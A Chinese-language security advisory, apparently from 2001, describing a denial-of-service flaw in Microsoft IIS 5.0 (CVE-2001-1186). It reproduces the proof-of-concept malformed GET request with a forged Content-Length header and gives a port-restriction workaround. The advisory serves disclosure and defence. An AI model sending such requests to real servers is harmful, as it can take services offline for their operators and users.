发布日期：2001-12-11
更新日期：2001-12-18

受影响系统：

Microsoft IIS 5.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1

描述：

---

BUGTRAQ  ID: 3667
CVE(CAN) ID: CVE-2001-1186

Microsoft IIS 5.0是随Windows 2000系统一起发布的流行的Web服务器程序。

IIS 5.0对意外情况的HTTP请求处理存在问题，远程攻击者通过向IIS 5.0发送一个精心构造的请求，可能导致IIS 5.0拒绝服务。

当IIS 5.0接到一个包含伪造的“Content-Length”域的GET请求时，会以一种异常的方式处理该请求，即IIS 5.0保持该连接并且不超时，但是不再响应其它请求。如果攻击者发送大量的上述畸形请求，就可能使IIS无法响应正常的连接请求，有可能造成拒绝服务攻击。

<*来源：Ivan Hernandez Puga （ivan.hernandez@globalsis.com.ar）
  
  链接：http://archives.neohapsis.com/archives/bugtraq/2001-12/0098.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ivan Hernandez Puga （ivan.hernandez@globalsis.com.ar）提供了如下的漏洞测试代码：

通过向IIS服务器的Web服务端口发送以下的数据，可以导致拒绝服务。

GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 通过配置限制非信任主机对80端口的访问。

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com

浏览次数：3490
严重程度：0（网友投票）